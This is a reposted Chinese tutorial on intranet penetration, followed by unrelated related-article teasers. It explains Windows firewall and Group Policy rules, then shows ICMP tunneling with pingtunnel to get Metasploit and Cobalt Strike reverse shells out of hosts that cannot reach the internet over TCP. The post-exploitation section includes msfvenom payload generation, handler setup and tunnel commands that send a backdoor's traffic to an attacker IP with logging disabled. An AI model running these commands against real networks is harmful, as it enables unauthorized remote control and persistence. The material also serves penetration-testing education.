内网安全:初探隧道技术

news2024/11/25 22:44:39

目录

防火墙必备知识

域控-防火墙组策略对象同步

域控 - 防火墙组策略不出网上线

MSF上线

CS - ICMP上线

注意:隧道技术是后渗透手段,是在已经取得权限后的手段

域控-组策略同步


防火墙必备知识

学习防火墙的目标是知道了解防火墙的一些常见配置对内网渗透的影响,并不需要像运维一样全面了解防火墙

参考资料:Windows防火墙限制端口/IP/应用访问的方法以及例外的配置

这是阿里云关于windows运维的文档,里面有常见的winodws防火墙配置 

防火墙(Firewall)是一种网络安全设备或软件,用于监控和控制网络流量,以保护计算机和网络免受未经授权的访问、恶意攻击和网络威胁。防火墙通过建立规则和过滤器来管理进出网络的数据流,以确保只有授权的数据能够通过。

防火墙的主要功能包括:

  1. 包过滤:防火墙检查传入和传出网络的数据包,并根据预定义的规则集来决定是否允许通过。这些规则基于源IP地址、目标IP地址、端口号、协议类型等来过滤数据包。
  2. 状态检测:防火墙可以追踪网络连接的状态,并仅允许与已建立连接相关的响应数据包通过。这有助于防止未经授权的外部主机访问内部网络。
  3. 网络地址转换(NAT):防火墙可以执行网络地址转换,将内部私有IP地址转换为公共IP地址,以增强网络安全和隐私。
  4. 应用程序过滤:一些高级防火墙还可以检查数据包中的应用层信息,例如应用程序协议、有效载荷内容等,以便更精确地控制应用程序级别的访问和流量。
  5. 虚拟专用网络(VPN)支持:一些防火墙具有VPN功能,可以提供安全的远程访问和加密通信,使远程用户能够安全地连接到内部网络。

通过配置适当的防火墙规则和策略,可以有效保护计算机和网络免受来自互联网和其他网络的潜在威胁。防火墙通常被广泛用于企业网络和个人计算机,作为网络安全的重要组成部分。

关于出站,入站规则:这个出站,入站是针对服务而言的。对于一个Web站点,配置入站规则就是检测访问我们的流量,出站规则就是检测本机出去的流量。

防火墙根据用户不同网络环境有不同的防火墙。比如:

  1. 主机在域内的规则配置
  2. 主机对某个目标的规则配置
  3. 主机对公网的规则配置

在生活中,我们可以运行某个执行程序,系统会提示我们是否允许该应用访问公网网络。

还可以根据具体的协议,端口进行规则设置

 还可以针对具体的协议进行出入站限制


有些破解软件的重要一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。

 

域控-防火墙组策略对象同步

在域中,可以通过组策略对域内所有设备进行配置防火墙规则

新建一个策略进行编辑

 这下图进行配置

配置规则

强制执行

域内服务器也可使用命令更新:

gpupdate/force

域成员强制同步DC域防火墙策略

域控 - 防火墙组策略不出网上线

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则

你可以Ping通百度,但无法访问百度网页。两个协议不一样!

思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决

这里将会以ICMP协议为例,ICMP协议是Ping命令走的协议

项目地址:

https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

这里我们实验是模拟DC禁用域成员主机TCP

实战中,TCP封杀的策略:

主机出站TCP封杀 入站无法链接外网

  • 采用正向连接:取得一台有网络的能和主机通讯的服务器权限(能连外网)
  • 把数据给能出网的机器,通过这台机器进行正向链接控制它

主机出站TCP封杀 入站可以链接外网

  • 采用正向连接
  • 或者隧道技术:走其它协议出网

这里的实验是把TCP的数据封装到ICMP协议里带出来。因为目标ICMP未被禁止。ICMP隧道技术,在目标服务器中开启脚本负责将后门的TCP流量转入到ICMP协议中,kali中开启脚本负责监听和接受信息

隧道技术对比代理技术:

隧道技术:解决不出网协议上线的问题,利用可出网协议封装

代理技术:解决网络通讯不通的问题,利用跳板机建立节点

这两种操作是已经取得该目标的system权限后,为了把权限移交出来而使用的,实现持久化控制。

MSF上线

MSF生成后门:

注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe

将TCP的流量发送到自己的4455端口

MSF启动监听:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit 

启动工具,它的作用是把发送ICMP流量还原位TCP流量再被MSF接收 

./pingtunnel -type server     需要在目标主机上执行 需要高权限

目标机器上启动工具,执行下面命令:

pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1

它可以把本地3333端口接收的TCP流量封装到ICMP协议里面,转发个MSF所在主机。

上线!!!

CS - ICMP上线

配置第一个监听器:

使用这个监听器生成后门

这个后门设置的原因和上面MSF是一样的,不再赘述。

生成第一个监听器

 用来接收反弹

攻击机上运行:

./pingtunnel -type server

被攻击机上运行:

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1

之后会在第二个监听器上接收到连接

 

注意:隧道技术是后渗透手段,是在已经取得权限后的手段

域控-组策略同步

域控进行了设置,所有的域内机器都要受到影响,委派下发

软件安装,密码更改等等

比如:给域内主机设置同一壁纸

壁纸所在目录设置共享

域内主机都能看到

完成设置,查看效果:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/598875.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ChatGPT应用助推跨境电商发展,低代码凭啥不行?!

随着互联网信息技术的不断发展,随之衍生的诸多产业也在蓬勃发展,而跨境电商就是互联网信息技术发展下的典型产物。 如何定义? 跨境电商指的是通过互联网销售商品或服务,跨越国家或地区边界,实现国际贸易的一种商业模式…

Linux 实操篇-实用指令

Linux 实操篇-实用指令 指定运行级别 基本介绍 运行级别说明: 0 :关机 1 :单用户【找回丢失密码】 2:多用户状态没有网络服务 3:多用户状态有网络服务 4:系统未使用保留给用户 5:图形界…

开发移动端官网总结_Vue2.x

目录 1、自定义加载中效果 2、HTML页面注入环境变量 / 加载CDN和本地库 3、在 Vue 中使用 wow.js 4、过渡路由 5、全局监听当前设备,切换PC端和移动端 6、移动端常用初始化样式 7、官网默认入口文件 8、回到顶部滑动过渡效果(显示与隐藏、滑动置…

由于找不到vcruntime140_1.dll无法继续执行此代码的三个解决方法

vcruntime140_1.dll是Microsoft Visual C Redistributable for Visual Studio的一部分,它是一个DLL文件,包含用于运行Microsoft Visual C创建的应用程序所需的Microsoft Visual C组件的代码和数据。这个DLL通常会随着应用程序安装到Windows系统中。如果这…

Dart语法学习

最近在学习flutter相关方面的知识,里面用到了Dart语言,于是写下这篇博客记录学习的一门过程。如果你有其他编程语言的经验(尤其是Java和JavaScript),可以很快的上手Dart语言,Dart 在设计时应该是同时借鉴了…

Spring Cloud Alibaba - Nacos源码分析

目录 一、源码 1、为什么要分析源码 2、看源码的方法 二、Nacos服务注册与发现源码剖析 1、Nacos核心功能点 2、Nacos服务端/客户端原理 2.1、nacos-example 2.2、Nacos-Client测试类 3、项目中实例客户端注册 一、源码 1、为什么要分析源码 1. 提升技术功底&#x…

Golang内存泄露场景与定位方式

个人博客 一、产生原因 Golang有自动垃圾回收机制,但是仍然可能会出现内存泄漏的情况。以下是Golang内存泄漏的常见可能原因: 循环引用:如果两个或多个对象相互引用,且没有其他对象引用它们,那么它们就会被垃圾回收机…

【计算机网络实验】BGP和OSPF协议仿真实验

实验内容  BGP和OSPF协议仿真实验 实验目的 (1)学习BGP协议的配置方法; (2)验证BGP协议的工作原理; (3)掌握网络自治系统的划分方法; (4)验证…

3分钟快速了解—App自动化测试是怎么实现H5测试的?

移动端 app 自动化框架很多,但是有一些框架因为不支持混合应用测试,一直没有完全流行。比较典型的是经典的 Python 框架 uiautomator2, 这个框架简单好用,没有 appium 那样复杂的 api 调用,受到不少 python 自动化工程师的青睐。 …

C++《stack和queue的一些OJ题目》

本文主要讲解C中stack和queue的一些OJ题目 文章目录 1、[最小栈](https://leetcode.cn/problems/min-stack/)2、[栈的压入、弹出序列](https://www.nowcoder.com/practice/d77d11405cc7470d82554cb392585106?tpId13&&tqId11174&rp1&ru/activity/oj&qru/ta…

路径规划算法:基于乌鸦优化的路径规划算法- 附代码

路径规划算法:基于乌鸦优化的路径规划算法- 附代码 文章目录 路径规划算法:基于乌鸦优化的路径规划算法- 附代码1.算法原理1.1 环境设定1.2 约束条件1.3 适应度函数 2.算法结果3.MATLAB代码4.参考文献 摘要:本文主要介绍利用智能优化算法乌鸦…

驱动开发:内核解析PE结构节表

在笔者上一篇文章《驱动开发:内核解析PE结构导出表》介绍了如何解析内存导出表结构,本章将继续延申实现解析PE结构的PE头,PE节表等数据,总体而言内核中解析PE结构与应用层没什么不同,在上一篇文章中LyShark封装实现了K…

ChatGPT国内免费使用方法【国内免费使用地址】

当下人工智能技术的快速发展,聊天机器人成为了越来越多人们日常生活和工作中的必备工具。如何在国内免费使用ChatGPT聊天机器人,成为了热门话题。本文将为你详细介绍ChatGPT国内免费使用方法,让你轻松拥有聊天机器人助手,提高工作…

基于Halcon卡尺测量: Metrology批量测量矩形和圆

处理图如下: 原图如下: 主要思想: 1.准备一次性将图中12个圆和2个矩形都检测出来 2.初步确定12个圆的圆心坐标和半径,初步确定两个矩形的中心坐标,角度,长短边长 3.创建计量模型 4.定义计量模型尺寸 5.增加检测矩形和圆形的信息参数 6.应用计量模型,获取结果 7.显示…

什么是 IMU?惯性测量单元工作和应用

术语IMU代表“惯性测量单元”,我们用它来描述测量工具的集合。当安装在设备中时,这些工具可以捕获有关设备移动的数据。IMU 包含加速度计、陀螺仪和磁力计等传感器。 IMU 如何工作? IMU 可以测量各种因素,包括速度、方向、加速度、…

vue 单点登录的方法

vue 单点登录的方法 当我们在使用 vue开发项目时,一般都是只有一个用户帐号,如果要实现多个帐号的单点登录,可以使用 Session和 LocalStorage这两个技术。这两个技术在实现单点登录时,都需要有一个用户名和一个密码,而…

【C++】C++ 11 智能指针

【C】C 11 智能指针 文章目录 【C】C 11 智能指针1.为什么需要智能指针2. C中智能指针和指针的区别是什么?3. C中的智能指针有哪些?分别解决的问题以及区别?(1)auto_ptr(C98的方案,C11已经弃用&…

JavaEE进阶(Mybatis)5/31

目录 1. SQL注入 2.concat()用于like模糊查询 3.resultMap 4. 5.动态SQL 6.foreach标签 1. SQL注入 $问题会导致SQL注入 因为$是直接替换的,and的优先级高于or true or false #不存在SQL注入的问题,因为他是预编译的&…

坚持的工作好习惯

工作好习惯 目录概述需求: 设计思路实现思路分析1.工作好习惯的重要性2.谈下自己的工作方法2.希望有时也从别人那里也学习一下看看 参考资料和推荐阅读 Survive by day and develop by night. talk for import biz , show your perfect code,full busy,s…

windows xp 上 Task Scheduler服务 启动后停止,导致数据库自动备份无法编辑和使用问题解决

项目中使用了mysql数据库,大多数人都会选择Navicat来连接数据库,一般会设置计划来自动备份数据库,但我在编辑自动备份的计划时,弹出task scheduler服务无法启动,退出回到桌面,启动windows的服务&#xff0c…